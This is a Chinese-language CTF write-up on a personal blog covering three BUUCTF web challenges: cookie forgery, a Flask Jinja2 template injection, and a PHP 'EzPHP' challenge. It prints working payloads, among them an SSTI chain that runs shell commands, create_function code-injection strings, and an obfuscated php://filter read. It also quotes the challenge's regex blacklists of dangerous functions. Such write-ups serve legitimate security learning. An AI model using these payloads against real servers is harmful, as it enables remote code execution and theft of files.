<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="buuctf20"><meta name="keywords" content=""><meta name="author" content="vague huang"><meta name="copyright" content="vague huang"><title>buuctf20 | Tlife</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  },
  hexoVersion: '5.2.0'
} </script><meta name="generator" content="Hexo 5.2.0"></head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="Toggle article">Toggle site</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#watevrCTF-2019-Cookie-Store"><span class="toc-number">1.</span> <span class="toc-text">[watevrCTF-2019]Cookie Store</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#RootersCTF2019-I-lt-3-Flask"><span class="toc-number">2.</span> <span class="toc-text">[RootersCTF2019]I_&lt;3_Flask</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B0%8Ftips"><span class="toc-number">2.1.</span> <span class="toc-text">小tips</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#BJDCTF2020-EzPHP"><span class="toc-number">3.</span> <span class="toc-text">[BJDCTF2020]EzPHP</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BB%95%E8%BF%87%E5%B0%8F%E7%BB%93"><span class="toc-number">3.1.</span> <span class="toc-text">绕过小结</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#create-function%E7%9A%84%E4%BD%BF%E7%94%A8"><span class="toc-number">3.2.</span> <span class="toc-text">create_function的使用</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-%E7%AE%80%E4%BB%8B"><span class="toc-number">3.2.1.</span> <span class="toc-text">1.简介</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-%E5%8A%9F%E8%83%BD%E5%88%86%E6%9E%90%E6%A1%88%E4%BE%8B"><span class="toc-number">3.2.2.</span> <span class="toc-text">2.功能分析案例</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-%E6%89%A7%E8%A1%8C%E5%8E%9F%E7%90%86%E5%88%86%E6%9E%90"><span class="toc-number">3.2.3.</span> <span class="toc-text">3.执行原理分析</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-%E6%9C%AC%E9%A2%98%E5%88%A9%E7%94%A8%E8%AF%A6%E8%A7%A3"><span class="toc-number">3.2.4.</span> <span class="toc-text">4.本题利用详解</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%9D%9E%E9%A2%84%E6%9C%9F%E8%A7%A3"><span class="toc-number">3.3.</span> <span class="toc-text">非预期解</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1%E5%8F%96%E5%8F%8D-%E5%BC%82%E6%88%96%E7%BB%95%E8%BF%87-%E4%BC%AA%E5%8D%8F%E8%AE%AE%E8%AF%BB%E6%BA%90%E7%A0%81"><span class="toc-number">3.3.1.</span> <span class="toc-text">1取反&#x2F;异或绕过+伪协议读源码</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B0%8F%E7%BB%93%EF%BC%9A"><span class="toc-number">3.4.</span> <span class="toc-text">小结：</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">vague huang</div><div class="author-info__description text-center"></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">132</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">Tags</span><span class="pull-right">18</span></a></div></div></div><div id="content-outer"><div class="no-bg" id="top-container"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Tlife</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/categories">Categories</a></span><span class="pull-right"></span></div><div id="post-info"><div id="post-title">buuctf20</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2021-06-21</time></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p>之前的博客忘记保存了。。。。呜呜呜呜</p>
<h2 id="watevrCTF-2019-Cookie-Store"><a href="#watevrCTF-2019-Cookie-Store" class="headerlink" title="[watevrCTF-2019]Cookie Store"></a>[watevrCTF-2019]Cookie Store</h2><p>cookie伪造，session是很明显的base64编码，把钱更改一下，然后id更改一下就可以拿到flag了</p>
<h2 id="RootersCTF2019-I-lt-3-Flask"><a href="#RootersCTF2019-I-lt-3-Flask" class="headerlink" title="[RootersCTF2019]I_&lt;3_Flask"></a>[RootersCTF2019]I_&lt;3_Flask</h2><p>介绍一个工具:<br><a target="_blank" rel="noopener" href="https://github.com/s0md3v/Arjun">Arjun</a>工具<br>使用python进行安装<br>简单介绍一下使用方法：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">python3 arjun -u http:&#x2F;&#x2F;25aa54c2-e825-4339-b4cf-b794f03a4221.node4.buuoj.cn&#x2F; -m get -c 150 -d 0.5</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/sectool/200175.html">https://www.freebuf.com/sectool/200175.html</a></p>
<img src="https://raw.githubusercontent.com/Hwwg/myphoto/master/20210708141802.png" alt="img" style="zoom:67%;">

<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/sectool/200175.html">https://www.freebuf.com/sectool/200175.html</a></p>
<p>扫出注入名为name，接下来直接构造注入语句进行注入</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">name&#x3D;&#123;&#123;%22%22.__class__.__base__.__subclasses__()[222](&#39;cat &#x2F;proc&#x2F;self&#x2F;cwd&#x2F;flag.txt&#39;,shell&#x3D;True,stdout&#x3D;-1).communicate()[0].strip()&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>其中也有遇到一个难点，就是找不到flag，越是先使用了find -name “flag*”找了一下flag，发现是flag.txt，但依旧不知道路径，于是翻了一下linux重要目录，使用/proc/self/cwd/列出了当前运行进程工作目录：<br><img src="https://raw.githubusercontent.com/Hwwg/myphoto/master/20210708135709.png" alt="img"></p>
<p>但是还是没有完整路径，这里就猜想了一下，这个路径能不能直接访问呢？</p>
<p><strong>没想到居然是可以的</strong><br>所以就有了以上payload</p>
<h3 id="小tips"><a href="#小tips" class="headerlink" title="小tips"></a>小tips</h3><p>可以通过/proc/self/cwd/直接cat到当前工作进程的文件<br>例如/proc/self/cwd/flag.txt 就可以直接cat到此flag而不需要去寻找flag的绝对路径</p>
<h2 id="BJDCTF2020-EzPHP"><a href="#BJDCTF2020-EzPHP" class="headerlink" title="[BJDCTF2020]EzPHP"></a>[BJDCTF2020]EzPHP</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>); </span><br><span class="line"></span><br><span class="line">$file = <span class="string">&quot;1nD3x.php&quot;</span>;</span><br><span class="line">$shana = $_GET[<span class="string">&#x27;shana&#x27;</span>];</span><br><span class="line">$passwd = $_GET[<span class="string">&#x27;passwd&#x27;</span>];</span><br><span class="line">$arg = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">$code = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;&lt;br /&gt;&lt;font color=red&gt;&lt;B&gt;This is a very simple challenge and if you solve it I will give you a flag. Good Luck!&lt;/B&gt;&lt;br&gt;&lt;/font&gt;&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>($_SERVER) &#123; </span><br><span class="line">    <span class="keyword">if</span> (</span><br><span class="line">        preg_match(<span class="string">&#x27;/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\&quot;|\&#x27;|log/i&#x27;</span>, $_SERVER[<span class="string">&#x27;QUERY_STRING&#x27;</span>])</span><br><span class="line">        )  </span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;You seem to want to do something bad?&#x27;</span>); </span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (!preg_match(<span class="string">&#x27;/http|https/i&#x27;</span>, $_GET[<span class="string">&#x27;file&#x27;</span>])) &#123;</span><br><span class="line">    <span class="keyword">if</span> (preg_match(<span class="string">&#x27;/^aqua_is_cute$/&#x27;</span>, $_GET[<span class="string">&#x27;debu&#x27;</span>]) &amp;&amp; $_GET[<span class="string">&#x27;debu&#x27;</span>] !== <span class="string">&#x27;aqua_is_cute&#x27;</span>) &#123; </span><br><span class="line">        $file = $_GET[<span class="string">&quot;file&quot;</span>]; </span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;Neeeeee! Good Job!&lt;br&gt;&quot;</span>;</span><br><span class="line">    &#125; </span><br><span class="line">&#125; <span class="keyword">else</span> <span class="keyword">die</span>(<span class="string">&#x27;fxck you! What do you want to do ?!&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>($_REQUEST) &#123; </span><br><span class="line">    <span class="keyword">foreach</span>($_REQUEST <span class="keyword">as</span> $value) &#123; </span><br><span class="line">        <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/[a-zA-Z]/i&#x27;</span>, $value))  </span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&#x27;fxck you! I hate English!&#x27;</span>); </span><br><span class="line">    &#125; </span><br><span class="line">&#125; </span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (file_get_contents($file) !== <span class="string">&#x27;debu_debu_aqua&#x27;</span>)</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;Aqua is the cutest five-year-old child in the world! Isn&#x27;t it ?&lt;br&gt;&quot;</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ( sha1($shana) === sha1($passwd) &amp;&amp; $shana != $passwd )&#123;</span><br><span class="line">    extract($_GET[<span class="string">&quot;flag&quot;</span>]);</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;Very good! you know my password. But what is flag?&lt;br&gt;&quot;</span>;</span><br><span class="line">&#125; <span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;fxck you! you don&#x27;t know my password! And you don&#x27;t know sha1! why you come here!&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">&#x27;/^[a-z0-9]*$/isD&#x27;</span>, $code) || </span><br><span class="line">preg_match(<span class="string">&#x27;/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\&#123;|\%|x|\&amp;|\$|\*|\||\&lt;|\&quot;|\&#x27;|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i&#x27;</span>, $arg) ) &#123; </span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;&lt;br /&gt;Neeeeee~! I have disabled all dangerous functions! You can&#x27;t get my flag =w=&quot;</span>); </span><br><span class="line">&#125; <span class="keyword">else</span> &#123; </span><br><span class="line">    <span class="keyword">include</span> <span class="string">&quot;flag.php&quot;</span>;</span><br><span class="line">    $code(<span class="string">&#x27;&#x27;</span>, $arg); </span><br><span class="line">&#125; <span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure>

<p>真好，又忘记保存博客了。</p>
<h3 id="绕过小结"><a href="#绕过小结" class="headerlink" title="绕过小结"></a>绕过小结</h3><p>1.<code>$_SERVER[&#39;QUERY_STRING&#39;]绕过</code><br>$_SERVER[‘QUERY_STRING’]接受数据是不会进行解码的，所以我们直接将传入的内容进行url编码即可</p>
<p>2.<code>preg_match绕过</code><br>正则匹配使用%0Aj进行换行操作即可绕过</p>
<p>3.<code>REQUEST值匹配绕过</code><br>由于post的优先级高于get，所以我们只要传一个post值就可以，当然是要数字</p>
<p>4.<code>file_get_contents绕过</code><br>我们知道file_get_contents是从文本中读取内容，那么这里就需要使用php的伪协议了，使用data即可格式为data:text/plain;+文本</p>
<p>5.<code>sha绕过使用数组进行绕过即可</code><br>就传入数组就行</p>
<p>但是很奇怪 当我在绕过第三个的时候发现就出问题了，，在本地尝试也是可以绕过的，但是到了buu上面就是绕不过？<br>看了一下wp 考点在于后面create_function的构建，于是就直接来学学吧</p>
<h3 id="create-function的使用"><a href="#create-function的使用" class="headerlink" title="create_function的使用"></a>create_function的使用</h3><h4 id="1-简介"><a href="#1-简介" class="headerlink" title="1.简介"></a>1.简介</h4><p>适用范围：<code>PHP 4&gt; = 4.0.1</code>，<code>PHP 5</code>，<code>PHP 7</code></p>
<p>功能：根据传递的参数创建匿名函数，并为其返回唯一名称。</p>
<p>语法：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">create_function(string $args,string $code)</span><br><span class="line">string $args 声明的函数变量部分</span><br><span class="line"></span><br><span class="line">string $code 执行的方法代码部分</span><br></pre></td></tr></table></figure>

<h4 id="2-功能分析案例"><a href="#2-功能分析案例" class="headerlink" title="2.功能分析案例"></a>2.功能分析案例</h4><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$newfunc = create_function(<span class="string">&#x27;$a,$b&#x27;</span>, <span class="string">&#x27;return &quot;ln($a) + ln($b) = &quot; . log($a * $b);&#x27;</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;New anonymous function: <span class="subst">$newfunc</span>\n&quot;</span>;</span><br><span class="line"><span class="keyword">echo</span> $newfunc(<span class="number">2</span>, M_E) . <span class="string">&quot;\n&quot;</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/Hwwg/myphoto/master/20210709112455.png" alt="img"></p>
<h4 id="3-执行原理分析"><a href="#3-执行原理分析" class="headerlink" title="3.执行原理分析"></a>3.执行原理分析</h4><p>create_funtion()会创建一个匿名函数（lambda样式）。此处创建了一个lambda_1的函数，在第一个echo中显示出名字，并在第二个echo语句中执行了此函数</p>
<p>create_function()函数会在内部执行eval()，我们发现是执行了后面的return语句，属于create_function()中的第二个参数string$code位置</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">lambda_1</span>(<span class="params">$a, $b</span>)</span>&#123;</span><br><span class="line">	<span class="keyword">return</span> $a+$b;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h4 id="4-本题利用详解"><a href="#4-本题利用详解" class="headerlink" title="4.本题利用详解"></a>4.本题利用详解</h4><p>本题利用点在这里:</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">$code(&#39;&#39;, $arg); </span><br></pre></td></tr></table></figure>

<p>第一个参数为空，第二个为可控参数，所以我们需要构造注入语句，看下$arg来自哪里。。逛了一圈，发现哪里都没有发现了extract() 函数</p>
<p><code>extract() 函数</code><br>从数组中将变量导入到当前的符号表。 该函数使用数组键名作为变量名，使用数组键值作为变量值。 针对数组中的每个元素，将在当前符号表中创建对应的一个变量。 该函数返回成功设置的变量数目。</p>
<p>所以我们就利用这个flag来改变arg的值<br>首先，构造出来的语句要具有变成下面这样:</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">function a&#123;</span><br><span class="line">	return $a;</span><br><span class="line">&#125;</span><br><span class="line">xxx;&#x2F;&#x2F;&#125;</span><br></pre></td></tr></table></figure>

<p>翻译成我们的注入语句即为：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&amp;flag[arg]&#x3D;&#125;a();&#x2F;&#x2F;&amp;flag[code]&#x3D;create_function</span><br></pre></td></tr></table></figure>

<p>而这个a后面的函数我们还有待构建就是了。。<br>接下的难点是<br>1.无法使用system()等函数执行系统命令，过滤了flag等关键字，过滤了print等关键字<br>但是,在这里还包含了</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">&#123; </span><br><span class="line">    <span class="keyword">include</span> <span class="string">&quot;flag.php&quot;</span>;</span><br><span class="line">    $code(<span class="string">&#x27;&#x27;</span>, $arg); </span><br><span class="line">&#125; <span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure>

<p>这里的这个思路就很奇妙了<br><strong>包含了这个文件，代表可以使用里面的变量，所以要想办法在不指定变量名称的情况下输出变量的值——get_defined_vars()函数用来输出所有的变量和值</strong></p>
<p>所以使用的payload为：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&amp;flag[arg]&#x3D;&#125;var_dump(get_defined_vars());&#x2F;&#x2F;&amp;flag[code]&#x3D;create_function</span><br></pre></td></tr></table></figure>

<p>但是此时只能获取到假的flag，继续构造:</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&amp;flag[arg]&#x3D;&#125;require(base64_decode(MWZsYWcucGhw));var_dump(get_defined_vars());&#x2F;&#x2F;&amp;flag[code]&#x3D;create_function</span><br></pre></td></tr></table></figure>

<p>由于环境受限没法复现完全，但是看了师傅们的文章感觉视野开拓了不少</p>
<h3 id="非预期解"><a href="#非预期解" class="headerlink" title="非预期解"></a>非预期解</h3><h4 id="1取反-异或绕过-伪协议读源码"><a href="#1取反-异或绕过-伪协议读源码" class="headerlink" title="1取反/异或绕过+伪协议读源码"></a>1取反/异或绕过+伪协议读源码</h4><p>payload:</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">require(~(%8F%97%8F%C5%D0%D0%99%96%93%8B%9A%8D%D0%8D%9A%9E%9B%C2%9C%90%91%89%9A%8D%8B%D1%9D%9E%8C%9A%C9%CB%D2%9A%91%9C%90%9B%9A%D0%8D%9A%8C%90%8A%8D%9C%9A%C2%CE%99%93%9E%98%D1%8F%97%8F));&#x2F;&#x2F;</span><br></pre></td></tr></table></figure>

<p>中间的取反结果为：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;1flag.php</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://www.gem-love.com/ctf/770.html#%E8%80%83%E7%82%B96%EF%BC%8Ccreatefunction()%E4%BB%A3%E7%A0%81%E6%B3%A8%E5%85%A5">https://www.gem-love.com/ctf/770.html#%E8%80%83%E7%82%B96%EF%BC%8Ccreatefunction()%E4%BB%A3%E7%A0%81%E6%B3%A8%E5%85%A5</a></p>
<h3 id="小结："><a href="#小结：" class="headerlink" title="小结："></a>小结：</h3><p>这题很可惜，似乎是环境出了点问题所以没办法做到最后一步，但是也收获了很多，尤其是最后文件包含的思路，眼前一亮，以及非预期解让我懂得了其实字符过滤，异或取反操作往往会有不一般的收获，</p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">vague huang</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="http://example.com/2021/06/21/buuctf20/">http://example.com/2021/06/21/buuctf20/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="post-meta__tag-list"></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2021/07/10/buuctf21/"><i class="fa fa-chevron-left">  </i><span>buuctf21</span></a></div><div class="next-post pull-right"><a href="/2021/06/18/buuctf19/"><span>buuctf19</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer><div class="layout" id="footer"><div class="copyright">&copy;2013 - 2021 By vague huang</div><div class="framework-info"><span>Driven - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>Theme - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/lib/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.0"></script><script src="/js/fancybox.js?version=1.9.0"></script><script src="/js/sidebar.js?version=1.9.0"></script><script src="/js/copy.js?version=1.9.0"></script><script src="/js/fireworks.js?version=1.9.0"></script><script src="/js/transition.js?version=1.9.0"></script><script src="/js/scroll.js?version=1.9.0"></script><script src="/js/head.js?version=1.9.0"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"log":false});</script></body></html>